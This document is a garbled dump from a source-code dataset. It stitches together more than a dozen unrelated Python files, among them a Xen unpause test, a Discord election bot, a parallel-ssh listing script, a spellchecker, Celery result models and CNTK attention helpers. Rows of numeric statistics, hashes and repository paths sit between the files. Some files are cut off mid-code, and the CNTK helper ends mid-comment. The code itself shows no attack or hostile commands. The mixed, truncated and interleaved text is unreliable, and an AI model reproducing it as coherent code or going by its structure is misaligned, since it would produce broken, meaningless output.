fen.label.grid(row=1,padx =5, pady =5) fen.yes_button=ttk.Button(fen.toplevel_dialog,text='Ok',width=48,command=Close_Toplevel) fen.yes_button.grid(row=4) def Close_Toplevel (): fen.wm_attributes("-disable",False) fen.toplevel_dialog.destroy() fen.deiconify() menu() fen.mainloop()
37.322545
152
0.657667
9,570
68,039
4.566353
0.050888
0.135835
0.161876
0.047323
0.886728
0.878261
0.868993
0.865492
0.863204
0.857895
0
0.021911
0.190376
68,039
1,822
153
37.34303
0.771394
0.062861
0
0.872385
0
0
0.082338
0
0
0
0
0
0
1
0.04742
false
0.019526
0.004184
0
0.070432
0.001395
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
e7cfb5f65289821950b5026983f1eb4b8e97063e
1,829
py
Python
xen/xen-4.2.2/tools/xm-test/tests/unpause/01_unpause_basic_pos.py
zhiming-shen/Xen-Blanket-NG
47e59d9bb92e8fdc60942df526790ddb983a5496
[ "Apache-2.0" ]
1
2018-02-02T00:15:26.000Z
2018-02-02T00:15:26.000Z
xen/xen-4.2.2/tools/xm-test/tests/unpause/01_unpause_basic_pos.py
zhiming-shen/Xen-Blanket-NG
47e59d9bb92e8fdc60942df526790ddb983a5496
[ "Apache-2.0" ]
null
null
null
xen/xen-4.2.2/tools/xm-test/tests/unpause/01_unpause_basic_pos.py
zhiming-shen/Xen-Blanket-NG
47e59d9bb92e8fdc60942df526790ddb983a5496
[ "Apache-2.0" ]
1
2019-05-27T09:47:18.000Z
2019-05-27T09:47:18.000Z
#!/usr/bin/python # Copyright (C) International Business Machines Corp., 2005 # Author: Paul Larson <pl@us.ibm.com> # Description: # Positive Tests: # Tests for xm unpause # 1) Create domain, verify it's up with console # 2) randomly pause and unpause the domain # 3) unpause it one last time # 4) verify it's still alive with console import time import commands from random import * from XmTestLib import * # Create a domain (default XmTestDomain, with our ramdisk) domain = XmTestDomain() # Start it try: console = domain.start() except DomainError, e: if verbose: print "Failed to create test domain because:" print e.extra FAIL(str(e)) try: # Make sure a command succeeds run = console.runCmd("ls") except ConsoleError, e: FAIL(str(e)) # Close the console domain.closeConsole() seed(time.time()) for i in range(100): pauseit = randint(0,1) if(pauseit): # Pause the domain status, output = traceCommand("xm pause %s" % domain.getName()) if status != 0: FAIL("xm pause returned invalid %i != 0", status) else: # Unpause the domain status, output = traceCommand("xm unpause %s" % domain.getName()) if status != 0: FAIL("xm unpause returned invalid %i != 0", status) # Make sure the domain is unpaused before we finish up status, output = traceCommand("xm unpause %s" % domain.getName()) if status != 0: FAIL("xm unpause returned invalid %i != 0", status) # Are we still alive after all that? try: console = domain.getConsole() run = console.runCmd("ls") except ConsoleError, e: FAIL(str(e)) # Close the console domain.closeConsole() if run["return"] != 0: FAIL("console failed to attach to supposedly unpaused domain") # Stop the domain (nice shutdown) domain.stop()
23.753247
73
0.663204
253
1,829
4.794466
0.434783
0.037098
0.019786
0.064303
0.359439
0.340478
0.304204
0.304204
0.280297
0.280297
0
0.014134
0.226353
1,829
76
74
24.065789
0.84311
0.329688
0
0.475
0
0
0.2
0
0
0
0
0
0
0
null
null
0
0.1
null
null
0.05
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
e7d05b674fc0a756fe709726953552b8a0021a86
1,420
py
Python
commands/elections.py
Nichodon/Democracy-Bot
708613944b25f7331b18153e5f90c18f44e38aff
[ "MIT" ]
null
null
null
commands/elections.py
Nichodon/Democracy-Bot
708613944b25f7331b18153e5f90c18f44e38aff
[ "MIT" ]
null
null
null
commands/elections.py
Nichodon/Democracy-Bot
708613944b25f7331b18153e5f90c18f44e38aff
[ "MIT" ]
null
null
null
import asyncio from demobot.utils import * from demobot.handlers import add_message_handler, nested_get, nested_set, nested_pop from commands.utilities import save async def running(Demobot, msg, reg): if nested_get(msg.server.id, "roles", 'citizen') in msg.author.roles: aliases = { 'rep': 'representative', 'representative': 'representative', 'ld': 'leader', 'pres': 'leader', 'president': 'leader', 'leader': 'leader' } if reg.group('pos') not in aliases: return dmm = await Demobot.send_message(msg.author, "DM me a description for " + aliases[reg.group('pos')] + ".") m = await Demobot.wait_for_message(timeout=600, author=msg.author, channel=dmm.channel) if not m: m = "*No description given*" else: m = m.content nested_pop(msg.server.id, 'elections', aliases[reg.group('pos')], msg.author.id) nested_set(Candidate(m, msg.author.id), msg.server.id, 'elections', aliases[reg.group('pos')], msg.author.id) await Demobot.send_message(msg.author, "You are now running.") await save(None, None, None, overrideperms=True) else: await Demobot.send_message(msg.channel, "You must be a citizen!") add_message_handler(running, r'I\s*(?:(?:want|would\s*like)\s*to\s*run|am\s*running)\s*for\s*(?P<pos>.*?)\Z')
43.030303
117
0.619718
188
1,420
4.601064
0.409574
0.072832
0.050867
0.079769
0.217341
0.187283
0.113295
0.113295
0.113295
0.113295
0
0.002747
0.230986
1,420
32
118
44.375
0.789377
0
0
0.068966
0
0.034483
0.209155
0.053521
0
0
0
0
0
1
0
false
0
0.137931
0
0.172414
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
e7d0a01dfe244608cccd3bc500765f871dee666f
861
py
Python
python/p-test.py
kettlewell/bashisms
c6222424984264c7c6488f20ea5591ff5078d040
[ "MIT" ]
null
null
null
python/p-test.py
kettlewell/bashisms
c6222424984264c7c6488f20ea5591ff5078d040
[ "MIT" ]
null
null
null
python/p-test.py
kettlewell/bashisms
c6222424984264c7c6488f20ea5591ff5078d040
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 ''' Force Python3 ''' from __future__ import print_function from pprint import pprint from pssh.pssh_client import ParallelSSHClient from pssh.exceptions import AuthenticationException, \ UnknownHostException, ConnectionErrorException import pssh.utils pssh.utils.enable_host_logger() hosts = ['vm-dc-js00001-dnguyen.svale.netledger.com'] client = ParallelSSHClient(hosts,proxy_host='nx') try: print("before run_command") output = client.run_command('ls -ltrh /home/mkettlewell', stop_on_errors=False) print("after run_command") client.join(output) print(output) for host in output: for line in output[host]['stdout']: print("Host %s - output: %s" % (host, line)) except (AuthenticationException, UnknownHostException, ConnectionErrorException): print("exception...") pass
23.27027
83
0.732869
100
861
6.17
0.55
0.048622
0.21718
0
0
0
0
0
0
0
0
0.009629
0.155633
861
36
84
23.916667
0.839065
0.04065
0
0
0
0
0.173594
0.050122
0
0
0
0
0
1
0
false
0.047619
0.238095
0
0.238095
0.333333
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
e7d2d32363335e20bef823b3804fd88486bdc7c4
122
py
Python
blocky_hardware.py
curlyz/blocky
ef23f81bd27a7a5cf34ec10b35dd9ca3fbd67691
[ "MIT" ]
null
null
null
blocky_hardware.py
curlyz/blocky
ef23f81bd27a7a5cf34ec10b35dd9ca3fbd67691
[ "MIT" ]
null
null
null
blocky_hardware.py
curlyz/blocky
ef23f81bd27a7a5cf34ec10b35dd9ca3fbd67691
[ "MIT" ]
null
null
null
Port1 = { "pin1" : 33 , "pin2" : 32 , "adc" : 33} #ICSP Cable Port2 = { "pin1" : 13 , "pin2" : 14 , "adc" : 34} #MP3 Port
61
62
0.491803
18
122
3.333333
0.777778
0
0
0
0
0
0
0
0
0
0
0.211111
0.262295
122
2
63
61
0.455556
0.147541
0
0
0
0
0.215686
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
4
e7d2ffd3f7f2be532081ab4ccbd72d2f7d534660
1,968
py
Python
text_mode.py
JacekPrzemieniecki/UNIFAC
c32702aeffd695a9fd3883cf150500e902df7a97
[ "MIT" ]
6
2016-01-04T02:33:13.000Z
2021-07-18T08:32:51.000Z
text_mode.py
JacekPrzemieniecki/UNIFAC
c32702aeffd695a9fd3883cf150500e902df7a97
[ "MIT" ]
1
2020-07-27T17:56:23.000Z
2020-08-10T06:30:06.000Z
text_mode.py
JacekPrzemieniecki/UNIFAC
c32702aeffd695a9fd3883cf150500e902df7a97
[ "MIT" ]
6
2015-01-02T19:18:16.000Z
2021-04-16T08:12:14.000Z
''' Created on 16-10-2012 @author: Jacek Przemieniecki ''' from unifac.facade import Facade #@UnresolvedImport class UI(object): def __init__(self): self.facade = Facade() def parse_file(self, f): """ Opens the file from patch f and executes commands inside""" with open(f) as raw_file: line_number = 1 commands = raw_file.readlines() try: for line in commands: self.run_command(line) line_number += 1 except Exception: # TODO: Exception handling raise def run_command(self, line): """Available commands: ADD <smiles> <quantity> <smiles> - SMILES notation of compound added <quantity> - amount (in moles) of compound REMOVE <smiles> <quantity> <smiles> - SMILES notation of compound removed <quantity> - amount (in moles) of compound PRINT prints calculation results for current solution RESET resets the solution""" command = line.split()[0] parameters = line.split()[1:3] if command == "ADD": self.facade.add_molecule_smiles(parameters[0], float(parameters[1])) elif command == "REMOVE": self.facade.add_molecule_smiles(parameters[0], float(-parameters[1])) elif command == "PRINT": self.print_result(parameters[0]) elif command == "RESET": self.facade.reset_solution() elif command == "TEMPERATURE": self.facade.set_temperature(float(parameters[0])) else: raise Exception() # TODO: Exception handling CommandError("Unknown command: %s" % command) def print_result(self, iden): print("Activity coefficient for: ", iden, " ", self.facade.get_coeff(iden)) ui = UI() while 1: ui.run_command(input())
31.741935
102
0.571138
211
1,968
5.227488
0.421801
0.054397
0.019946
0.054397
0.253853
0.253853
0.197643
0.11786
0.11786
0.11786
0
0.015072
0.325711
1,968
61
103
32.262295
0.816127
0.292683
0
0
0
0
0.044152
0
0
0
0
0.032787
0
1
0.117647
false
0
0.029412
0
0.176471
0.088235
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
e7d451a5141cd5cf0b8b79bacc909a39ece22eab
848
py
Python
ping.py
FoxUnderGround/Ping-Plot
4a61b147c2e1f4ee79cd77ea8500fc70175b59c7
[ "MIT" ]
1
2020-03-06T14:18:34.000Z
2020-03-06T14:18:34.000Z
ping.py
FoxUnderGround/Ping-Plot
4a61b147c2e1f4ee79cd77ea8500fc70175b59c7
[ "MIT" ]
null
null
null
ping.py
FoxUnderGround/Ping-Plot
4a61b147c2e1f4ee79cd77ea8500fc70175b59c7
[ "MIT" ]
null
null
null
from pythonping import ping import matplotlib.pyplot as plt import matplotlib.animation as animation from matplotlib import style style.use('fivethirtyeight') fig = plt.figure() ax1 = fig.add_subplot(1,1,1) xs_min=[0] ys_min=[5] def animate(z): ping_out = ping('8.8.8.8', count = 2) ping_arr = str(ping_out)[len(str(ping_out))-28:].split(" ") print(ping_arr) for i in range(len(ping_arr)): if len(ping_arr[i]) > 10: time_min = ping_arr[i].split("/")[0] print(time_min) xs_min.append(float(len(xs_min))) ys_min.append(float(time_min)) #print(xs_min) #print(ys_min) ax1.clear() ax1.plot(xs_min[-50:],ys_min[-50:],linewidth=2) ani = animation.FuncAnimation(fig, animate, interval=50) plt.show() print(xs_min)
21.74359
64
0.610849
129
848
3.844961
0.410853
0.060484
0.012097
0
0
0
0
0
0
0
0
0.03888
0.241745
848
38
65
22.315789
0.732504
0.03066
0
0
0
0
0.030691
0
0
0
0
0
0
1
0.041667
false
0
0.166667
0
0.208333
0.125
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
e7d57733a14bd14b22ac54f00ccfc5903ce8b1c4
669
py
Python
cumulusci/tasks/robotframework/tests/TestLibrary.py
jdominiczak/CumulusCI
f706c1906f9eb6d604c571a9dd16f5d0ed38599f
[ "BSD-3-Clause" ]
163
2018-09-13T18:49:34.000Z
2022-03-25T08:37:15.000Z
cumulusci/tasks/robotframework/tests/TestLibrary.py
jdominiczak/CumulusCI
f706c1906f9eb6d604c571a9dd16f5d0ed38599f
[ "BSD-3-Clause" ]
1,280
2018-09-11T20:09:37.000Z
2022-03-31T18:40:21.000Z
cumulusci/tasks/robotframework/tests/TestLibrary.py
jdominiczak/CumulusCI
f706c1906f9eb6d604c571a9dd16f5d0ed38599f
[ "BSD-3-Clause" ]
125
2015-01-17T16:05:39.000Z
2018-09-06T19:05:00.000Z
# from cumulusci.robotframework.utils import selenium_retry # The following decorator is commented out, because with it the # library gets two extra keywords. I'm not certain if that's what # should be happening, or if those two keywords are actually just # helper functions that are accidentially ending up as keywords # @selenium_retry class TestLibrary(object): """Documentation for the TestLibrary library.""" def library_keyword_one(self): """Keyword documentation with *bold* and _italics_""" return "this is keyword one from TestLibrary.py" def library_keyword_two(self): return "this is keyword two from TestLibrary.py"
35.210526
65
0.748879
92
669
5.358696
0.630435
0.052738
0.068966
0.077079
0
0
0
0
0
0
0
0
0.185351
669
18
66
37.166667
0.904587
0.623318
0
0
0
0
0.330508
0
0
0
0
0
0
1
0.4
false
0
0
0.2
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
e7d5c15d7006467f20bff9ef1db02036b30e8aa0
3,875
py
Python
python/spellcheck.py
andrewgaul/src
4dd18eaf692c1a3740b00c68b3c088842d958e7a
[ "MIT" ]
null
null
null
python/spellcheck.py
andrewgaul/src
4dd18eaf692c1a3740b00c68b3c088842d958e7a
[ "MIT" ]
null
null
null
python/spellcheck.py
andrewgaul/src
4dd18eaf692c1a3740b00c68b3c088842d958e7a
[ "MIT" ]
null
null
null
#!/usr/bin/env python '''spellcheck.py - parse source code and spell check comments, strings, or all tokens. Usage: find $SRCDIR -name \*.java | spellcheck.py --dict /usr/share/dict/words Most users will need a large custom dictionary of technical terms, e.g., HTTP, malloc, etc. Users may want to pipe output through "sort | uniq -c | sort -n" to find unusual and often incorrect spellings. ''' __VERSION__ = 20180615 # TODO: allow compoundwords? # TODO: bundle standard programming dictionary # TODO: calculate edit distance from misspellings to likely spellings # TODO: control word-splitting: camelCase, contractions, hyphenation # TODO: diff mode for pre-push hooks # TODO: emit file names and line numbers # TODO: ignore comments, /* */, //, # # TODO: ignore hex hashes # TODO: ignore URLs # TODO: incremental mode: show new misspellings since last run # TODO: port to python 3 # TODO: show unusual spellings first (configurable limit?) # TODO: single- and double-quote strings # TODO: upper-case letters # compare with: http://pypi.python.org/pypi/scspell import argparse import re import string import sys STRING_CHAR = '"' def parse_stream(stream, tokenize_all): '''Parse strings from stream of source code and emit tokenized words, e.g., string = "foo bar" -> [foo, bar] "myString" -> [my, string] ''' for line in stream: string = '' in_string = False in_backslash = False last_char = None for char in line: if tokenize_all or in_string: if in_backslash: in_backslash = False yield string string = '' elif char == '\\': in_backslash = True # parse camelCase # XXX better to do this outside parse_stream? elif (char.isupper() and last_char is not None and last_char.isalpha() and not last_char.isupper()): yield string string = char elif char == STRING_CHAR: in_string = False yield string string = '' else: string += char else: if char == STRING_CHAR: in_string = True last_char = char if len(string) > 0: yield string string = '' translations = string.maketrans(string.ascii_uppercase, string.ascii_lowercase) deletions = string.digits + string.punctuation + string.whitespace def populate_dictionary(filename, dictionary): with open(filename, 'r') as f: for word in f: dictionary.add(word.translate(translations, deletions)) def main(): parser = argparse.ArgumentParser( description='spell check strings in source code') parser.add_argument('--dict', dest='dictionaries', action='append', required=True) parser.add_argument('--tokenize-all', dest='tokenize_all', action='store_true', default=False) args = parser.parse_args(sys.argv[1:]) all_dictionaries = set() for wordlist in args.dictionaries: populate_dictionary(wordlist, all_dictionaries) exit_code = 0 for filename in sys.stdin: filename = filename[:-1] with open(filename, 'r') as f: for my_string in parse_stream(f, args.tokenize_all): # TODO: second parser! for word in re.split("[^A-Za-z]", my_string): cword = word.translate(translations, deletions) if cword == '': continue if cword not in all_dictionaries: exit_code = 1 print(word) sys.exit(exit_code) if __name__ == '__main__': main()
33.405172
79
0.594065
450
3,875
5.002222
0.42
0.022212
0.030209
0.019547
0.039982
0.020435
0.020435
0
0
0
0
0.005281
0.315871
3,875
115
80
33.695652
0.843833
0.314065
0
0.231884
0
0
0.044376
0
0
0
0
0.017391
0
1
0.043478
false
0
0.057971
0
0.101449
0.014493
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
1
e7d8a57bd82d83430fc2050120ea5bf3d037a7e3
1,981
py
Python
sliding_racket/Environment.py
alizindari/Deep-Reinforcement-Learning
315aedcaaa2ba134e77c95270fd30ed5d814182c
[ "MIT" ]
1
2022-01-24T06:11:18.000Z
2022-01-24T06:11:18.000Z
sliding_racket/Environment.py
alizindari/Deep-Reinforcement-Learning
315aedcaaa2ba134e77c95270fd30ed5d814182c
[ "MIT" ]
null
null
null
sliding_racket/Environment.py
alizindari/Deep-Reinforcement-Learning
315aedcaaa2ba134e77c95270fd30ed5d814182c
[ "MIT" ]
null
null
null
import numpy as np from collections import deque from experience_replay import * from brain import * from agent import * from Hyperparameters import * class Environment: def __init__(self,x,y): param = Hyperparameters() self.x = x self.y = y self.buff = deque(maxlen= param.CHANNEL_NUM) def reset(self): self.map = np.zeros([self.x,self.y]) self.x_pos = 0 self.y_pos = np.random.randint(0,self.y) self.map[self.x_pos,self.y_pos] = 1 self.bar_init = np.random.randint(0,self.y-7) self.bar = [self.bar_init,self.bar_init+5] self.map[self.x-1,self.bar[0]:self.bar[1]] = 1 self.buff.append(self.map) self.buff.append(self.map) self.buff.append(self.map) return torch.tensor(np.stack(self.buff,axis=0),dtype= torch.float32).to('cpu') def step(self,action): self.x_pos += 1 done = False reward = 0 if self.x_pos == self.x-1 and self.map[self.x_pos,self.y_pos] == 1: reward = 5 done = True if self.x_pos == self.x-1 and self.map[self.x_pos,self.y_pos] == 0: reward = -1 done = True if action == 0: if self.bar[0] == 0: pass else: self.bar[0] -= 1 self.bar[1] -= 1 if action == 1: if self.bar[1] == self.y: pass else: self.bar[1] += 1 self.bar[0] += 1 if action == 2: pass self.map = np.zeros([self.x,self.y]) self.map[self.x_pos,self.y_pos] = 1 self.map[self.x-1,self.bar[0]:self.bar[1]] = 1 self.buff.append(self.map) return torch.tensor(np.stack(self.buff,axis=0),dtype= torch.float32).to('cpu'),reward,done
27.513889
98
0.498233
281
1,981
3.434164
0.199288
0.082902
0.066321
0.074611
0.524352
0.510881
0.472539
0.472539
0.472539
0.422798
0
0.034566
0.372034
1,981
72
99
27.513889
0.741158
0
0
0.320755
0
0
0.003029
0
0
0
0
0
0
1
0.056604
false
0.056604
0.113208
0
0.226415
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
e7da5c2603cd6fccdacd996246a799e84c9ef725
2,040
py
Python
restful_falcon/contrib/celery_results/db/model/task.py
wynterwang/restful-falcon
f246e14c8442f358c862c118ae1dfdbd93d9e0a0
[ "MIT" ]
null
null
null
restful_falcon/contrib/celery_results/db/model/task.py
wynterwang/restful-falcon
f246e14c8442f358c862c118ae1dfdbd93d9e0a0
[ "MIT" ]
null
null
null
restful_falcon/contrib/celery_results/db/model/task.py
wynterwang/restful-falcon
f246e14c8442f358c862c118ae1dfdbd93d9e0a0
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- # __author__ = "wynterwang" # __date__ = "2020/9/18" from __future__ import absolute_import from datetime import datetime from celery import states from restful_falcon.core.db.model import Column from restful_falcon.core.db.model import Model from restful_falcon.core.db.model import Sequence from restful_falcon.core.db.type import DateTime from restful_falcon.core.db.type import Integer from restful_falcon.core.db.type import LargeBinary from restful_falcon.core.db.type import PickleType from restful_falcon.core.db.type import String from restful_falcon.core.db.type import Text class Task(Model): """ Task result/status. """ __tablename__ = "celery_taskmeta" __table_args__ = {"sqlite_autoincrement": True} id = Column(Integer, Sequence("task_id_sequence"), primary_key=True, autoincrement=True) task_id = Column(String(155), unique=True) status = Column(String(50), default=states.PENDING) result = Column(PickleType, nullable=True) date_done = Column(DateTime, default=datetime.utcnow, onupdate=datetime.utcnow, nullable=True) traceback = Column(Text, nullable=True) class TaskExtended(Task): """ For the extend result. """ __tablename__ = "celery_taskmeta" __table_args__ = {"sqlite_autoincrement": True, "extend_existing": True} name = Column(String(155), nullable=True) args = Column(LargeBinary, nullable=True) kwargs = Column(LargeBinary, nullable=True) worker = Column(String(155), nullable=True) retries = Column(Integer, nullable=True) queue = Column(String(155), nullable=True) class TaskSet(Model): """ TaskSet result. """ __tablename__ = "celery_tasksetmeta" __table_args__ = {"sqlite_autoincrement": True} id = Column(Integer, Sequence("taskset_id_sequence"), autoincrement=True, primary_key=True) taskset_id = Column(String(155), unique=True) result = Column(PickleType, nullable=True) date_done = Column(DateTime, default=datetime.utcnow, nullable=True)
31.384615
98
0.736275
253
2,040
5.675889
0.256917
0.091922
0.106546
0.131616
0.541086
0.48468
0.447075
0.238162
0.183844
0.107242
0
0.014484
0.153922
2,040
64
99
31.875
0.817497
0.063725
0
0.162162
0
0
0.084855
0
0
0
0
0
0
1
0
false
0
0.324324
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
2
e7db7546214ecb41828bad2746f7c33166640ce9
700
py
Python
mirari/SV/urls.py
gcastellan0s/mirariapp
24a9db06d10f96c894d817ef7ccfeec2a25788b7
[ "MIT" ]
null
null
null
mirari/SV/urls.py
gcastellan0s/mirariapp
24a9db06d10f96c894d817ef7ccfeec2a25788b7
[ "MIT" ]
18
2019-12-27T19:58:20.000Z
2022-02-27T08:17:49.000Z
mirari/SV/urls.py
gcastellan0s/mirariapp
24a9db06d10f96c894d817ef7ccfeec2a25788b7
[ "MIT" ]
null
null
null
from mirari.mirari.urls import * from django.views.generic.base import RedirectView from .views import * from .vars import * app_name = APP urlpatterns = [ path('sv/', sv__Sellpoint__TemplateView.as_view(), name='sv__Sellpoint__TemplateView'), path('api/SellpointApiView/<slug:app>/<slug:action>/<slug:model>/', Sellpoint__ApiView.as_view(), name='Sellpoint__ApiView'), path('SVbarcodeScanner/', SVbarcodeScanner__TemplateView.as_view(), name='SVbarcodeScanner__TemplateView'), path('TicketInvoiceMX/', TicketInvoiceMX__TemplateView.as_view(), name='TicketInvoiceMX__TemplateView'), path('GetTicketQR/', GetTicketQR__TemplateView.as_view(), name='GetTicketQR__TemplateView'), ]
46.666667
129
0.775714
76
700
6.75
0.368421
0.05848
0.097466
0.17154
0
0
0
0
0
0
0
0
0.085714
700
15
130
46.666667
0.801563
0
0
0
0
0
0.336662
0.242511
0
0
0
0
0
1
0
false
0
0.333333
0
0.333333
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
2
e7db7db77f02f9ba4f004fea0210493ed47227bf
168
py
Python
My/test.py
wangzihan424/Myblog
480443f2b6209f69dc8ab4e36349a41bf3c5c0a1
[ "MIT" ]
1
2018-01-01T12:31:51.000Z
2018-01-01T12:31:51.000Z
My/test.py
wangzihan424/Myblog
480443f2b6209f69dc8ab4e36349a41bf3c5c0a1
[ "MIT" ]
null
null
null
My/test.py
wangzihan424/Myblog
480443f2b6209f69dc8ab4e36349a41bf3c5c0a1
[ "MIT" ]
null
null
null
# -*- coding:utf-8 -*- class People(object): pass class People1(object): def __str__(self): return "123" p = People() print p p1 = People1() print p1
12.923077
22
0.60119
23
168
4.217391
0.695652
0
0
0
0
0
0
0
0
0
0
0.062992
0.244048
168
13
23
12.923077
0.700787
0.119048
0
0
0
0
0.020408
0
0
0
0
0
0
0
null
null
0.111111
0
null
null
0.222222
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
1
0
0
0
0
0
3
e7dbfa3534c103b51f102189f319e15ea8011535
7,178
py
Python
helpers.py
jyh764790374/R-Net-in-CNTK
2eac05cb45bc52635bb4698729805d7e12af436e
[ "Unlicense" ]
17
2018-07-27T07:09:18.000Z
2021-02-27T17:08:36.000Z
helpers.py
jyh764790374/R-Net-in-CNTK-MS-MARCO-
2eac05cb45bc52635bb4698729805d7e12af436e
[ "Unlicense" ]
null
null
null
helpers.py
jyh764790374/R-Net-in-CNTK-MS-MARCO-
2eac05cb45bc52635bb4698729805d7e12af436e
[ "Unlicense" ]
2
2018-10-17T02:51:06.000Z
2018-10-21T11:47:54.000Z
import numpy as np import cntk as C from cntk.layers.blocks import _INFERRED def OptimizedRnnStack(hidden_dim, num_layers=1, recurrent_op='gru', bidirectional=False, use_cudnn=True, name=''): if use_cudnn: W = C.parameter(_INFERRED + (hidden_dim,), init=C.glorot_uniform()) def func(x): return C.optimized_rnnstack(x, W, hidden_dim, num_layers, bidirectional, recurrent_op=recurrent_op, name=name) return func else: def func(x): return C.splice( C.layers.Recurrence(C.layers.GRU(hidden_dim))(x), C.layers.Recurrence(C.layers.GRU(hidden_dim), go_backwards=True)(x), name=name) return func def seq_loss(logits, y): prob = C.sequence.softmax(logits) return -C.log(C.sequence.last(C.sequence.gather(prob, y))) ''' def attention_pooling(inputs, inputs_weights, decode, decode_weights, keys): """ inputs: shape=(dim, n) inputs_weight: shape=(dim, dim) decode: shape=(1, dec_dim) decode_weights: shape=(dim, dec_dim) keys: shape=(1, dim) """ w_in = C.times(inputs_weights ,inputs) #shape=(dim, n) decode = C.transpose(decode, perm=(1,0)) w_dec = C.times(decode_weights ,decode) #shape=(dim, dim) S = C.tanh(C.plus(C.transpose(w_in, perm=(1,0)), C.transpose(w_dec, perm=(1,0)))) #shape=(n, dim) S = C.times(S, C.transpose(keys, perm=(1,0))) #shape=(n) S = C.ops.sequence.softmax(S, name="softmax") attention = C.transpose(C.times(inputs ,S), perm=(1,0)) return attention ''' def attention_pooling(inputs, inputs_mask, inputs_weights, decode, decode_weights, keys): """ inputs: shape=(n, dim) inputs_weight: shape=(dim, dim) decode: shape=(1, dec_dim) decode_weights: shape=(dec_dim, dim) keys: shape=(dim, 1) """ w_in = C.times(inputs, inputs_weights) #shape=(n, dim) w_dec = C.times(decode, decode_weights) #shape=(dim, 1) S = C.tanh(w_in + C.sequence.broadcast_as(w_dec, w_in)) #shape=(n, dim) S = C.element_select(inputs_mask, S, C.constant(-1e+30)) S = C.times(S, keys) #shape=(n) S = C.ops.sequence.softmax(S, name="softmax") attention = C.reduce_sum(inputs * S, axis=0) return attention ''' def question_pooling(inputs, inputs_dim): Wp = C.parameter(shape=(inputs_dim,inputs_dim)) Vp = C.parameter(shape=(inputs_dim, 1)) outputs_w = C.times(C.tanh(C.times(inputs, Wp)), Vp) # Vp = C.parameter(shape=(inputs_dim)) # outputs_w = C.sequence.reduce_sum(C.tanh(C.times(inputs, Wp)) * Vp, 1) outputs_w = C.sequence.softmax(inputs) outputs = outputs_w * inputs return outputs def att_weight(h_enc, h_dec, inputs_dim): w_enc = C.parameter(shape=(inputs_dim,inputs_dim)) w_dec = C.parameter(shape=(inputs_dim,inputs_dim)) wh_enc = C.times(h_enc, w_enc) wh_dec = C.times(h_dec, w_dec) s_t = C.tanh(wh_dec + wh_enc) v_t = C.parameter(shape=(inputs_dim, 1)) s_t = C.times(s_t ,v_t) # v_t = C.parameter(shape=(inputs_dim)) # s_t = C.sequence.reduce_sum(s_t * v_t, 1) wh_weight = C.sequence.softmax(s_t) return wh_weight ''' ''' def question_pooling(inputs, inputs_dim): inputs_w, inputs_mask = C.sequence.unpack(inputs, padding_value=0).outputs Wp = C.parameter(shape=(inputs_dim,inputs_dim)) Vp = C.parameter(shape=(inputs_dim,1)) outputs_w = C.times(C.tanh(C.times(inputs_w, Wp)), Vp) outputs_w = C.softmax(C.element_select(inputs_mask, outputs_w, C.constant(-1e+30)), axis=0) outputs = outputs_w * inputs_w outputs = C.reduce_sum(outputs, 0) return outputs def att_weight(h_enc, h_dec, inputs_dim): h_enc_w, h_enc_mask = C.sequence.unpack(h_enc, padding_value=0).outputs w_enc = C.parameter(shape=(inputs_dim, inputs_dim)) w_dec = C.parameter(shape=(inputs_dim, inputs_dim)) v_t = C.parameter(shape=(inputs_dim)) wh_enc = C.times(h_enc_w, w_enc) wh_dec = C.times(h_dec, w_dec) s_t = C.tanh(C.sequence.broadcast_as(wh_dec, wh_enc) + wh_enc) s_t = C.element_select(h_enc_mask, s_t, C.constant(-1e+30)) s_t = C.reduce_sum(s_t * v_t, 1) wh_weight = C.softmax(s_t) return wh_weight ''' def question_pooling(inputs, inputs_dim): outputs_w = C.layers.Dense(1, activation=C.tanh, name='out_start')(inputs) outputs_w = C.sequence.softmax(outputs_w) outputs = C.sequence.reduce_sum(outputs_w * inputs) return outputs def attention_weight(h_enc, h_dec, inputs_dim): enc = C.layers.Dense(inputs_dim, name='out_start')(h_enc) dec = C.sequence.broadcast_as(C.layers.Dense(inputs_dim, name='out_start')(h_dec), enc) att_weight = C.layers.Dense(1, name='out_start')(C.tanh(enc+dec)) att_weight = C.sequence.softmax(att_weight) return att_weight def all_spans_loss(start_logits, start_y, end_logits, end_y): # this works as follows: # let end_logits be A, B, ..., Y, Z # let start_logits be a, b, ..., y, z # the tricky part is computing log sum (i<=j) exp(start_logits[i] + end_logits[j]) # we break this problem as follows # x = 